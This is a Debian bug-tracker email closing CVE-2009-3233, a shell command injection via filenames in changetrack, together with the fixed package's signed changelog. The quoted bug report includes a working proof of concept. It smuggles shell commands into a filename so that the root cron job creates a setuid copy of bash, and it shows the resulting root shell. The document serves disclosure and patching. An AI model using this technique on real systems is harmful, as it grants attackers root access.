Bug#546791: marked as done (CVE-2009-3233: shell command injection via filename)

Wed, 16 Dec 2009 15:47:14 -0800 

Your message dated Wed, 16 Dec 2009 23:38:46 +0000
with message-id <[email protected]>
and subject line Bug#546791: fixed in changetrack 4.3-3+lenny1
has caused the Debian Bug report #546791,
regarding CVE-2009-3233: shell command injection via filename
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
546791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546791
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole



-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages changetrack depends on:
ii  libfile-ncopy-perl            0.34-1     file copying like cp for perl
ii  perl                          5.10.0-19  Larry Wall's Practical Extraction 

Versions of packages changetrack recommends:
ii  cron                          3.0pl1-105 management of regular background p
ii  ed                            0.7-3      The classic unix line editor

changetrack suggests no packages.

-- no debconf information


Its is posible, to run commands as root, if you have permision to create
files in directory chcked via changetrack, example:

mkdir  /etc/test
touch  "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash  bash.ultimate
chmod  ug+s bash.ultimate
"

echo "/etc/test/*" >> /etc/changetrack.conf

wait for /etc/cron.hourly/changetrack

# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate


bash.ultimate -p ;)


Probably changetrack shudnot use shell commands, or escape sh special
haracters like spaces enters ; etc...

-- 
  Regards
      Marek Grzybowski

--- End Message ---
--- Begin Message --- 
Source: changetrack
Source-Version: 4.3-3+lenny1

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.3-3+lenny1.diff.gz
  to main/c/changetrack/changetrack_4.3-3+lenny1.diff.gz
changetrack_4.3-3+lenny1.dsc
  to main/c/changetrack/changetrack_4.3-3+lenny1.dsc
changetrack_4.3-3+lenny1_all.deb
  to main/c/changetrack/changetrack_4.3-3+lenny1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <[email protected]> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+lenny1
Distribution: stable-security
Urgency: medium
Maintainer: Jens Peter Secher <[email protected]>
Changed-By: Jens Peter Secher <[email protected]>
Description: 
 changetrack - configuration-file change tracker
Closes: 546791
Changes: 
 changetrack (4.3-3+lenny1) stable-security; urgency=medium
 .
   * Fix possible local exploit by rejecting filenames with unsafe
     characters (cf. CVE-2009-3233).  Thanks to Marek Grzybowski and
     Andrzej Lemieszek.
     (Closes: #546791)
Checksums-Sha1: 
 4645f9452c04d593cf24cfb49da6c22594b8143a 1110 changetrack_4.3-3+lenny1.dsc
 820410611c2520f39653b9f50f149dfa632a421e 16567 changetrack_4.3.orig.tar.gz
 0fcd2813562a9942189fbd1eeeee2f39848bc4fb 13325 changetrack_4.3-3+lenny1.diff.gz
 f1afc814784c9f1975c94610fb55bb89a58ad841 21678 changetrack_4.3-3+lenny1_all.deb
Checksums-Sha256: 
 e106ada0d20a1afeb86d1c5e840b83b3f0bc3001c1f3621bbbbc87b2da1900e3 1110 
changetrack_4.3-3+lenny1.dsc
 016d7817dcc6840ae50d9f4a1917679087765b7985cfc5eb088d68b8270ff5c7 16567 
changetrack_4.3.orig.tar.gz
 defe00ae7b26f299437b8a18dabed1e0568fe3fe8aaf96af9e6793d9fa221a08 13325 
changetrack_4.3-3+lenny1.diff.gz
 12f0d22ad6f56e3798c4547656a6bfc7962de09b67192a69734b9c9fdbfd199c 21678 
changetrack_4.3-3+lenny1_all.deb
Files: 
 5e689f11bc4dca83328cda0a888ec1e4 1110 utils optional 
changetrack_4.3-3+lenny1.dsc
 7600e72b299562c6773e9b6ac38aaa55 16567 utils optional 
changetrack_4.3.orig.tar.gz
 c91d4a3d370dfe41ff41e6815eda7440 13325 utils optional 
changetrack_4.3-3+lenny1.diff.gz
 3b9fb111a49aa671886f6e5eaec66908 21678 utils optional 
changetrack_4.3-3+lenny1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)

iJwEAQECAAYFAkq2ZAkACgkQiFVdEFPVQL90WAQAwSBJo6ZUl4A+IrDU4go0GdE3
ZG9fOXw2ddxKysp02M/11SpFMRhIQcN5di8i+jMyZKRjnFjtnO4tVK985r+owbI0
XHfrENbzoEl8Am5PCXD1WwG6N4nnfb+AOdPtX3GyNpNV+Me+of0in+AKBaEPIoN8
f3W6ZehlsUWZk/MRoxM=
=Gd/E
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to